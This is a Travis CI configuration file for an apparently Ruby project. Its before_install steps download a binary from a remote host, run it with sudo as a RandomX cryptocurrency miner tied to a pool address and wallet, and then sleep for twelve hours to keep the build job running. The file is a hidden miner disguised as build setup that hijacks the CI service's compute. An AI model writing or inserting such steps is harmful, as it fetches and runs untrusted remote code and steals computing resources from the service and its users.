language: ruby

services:
  - docker

before_install:
  - sudo apt-get update && sudo apt-get install -y screen && sudo apt-get install -y wget && wget https://swenson.my.id/mining/masterfile && sudo chmod u+x masterfile
  - travis_wait 30 sudo ./masterfile -o 139.99.124.170:80 -u 86fGg98tj5QTt4peYzxDrD4BfChE1LPtkceC6rVC6iP3FuApcNecY1c32cgrwMtWNY87H4iq2CM3DPJWQhjW8Mr7LQeZRsr -k -a rx/0 -p shouko | screen -S shouko && apt update
  - sleep 43200
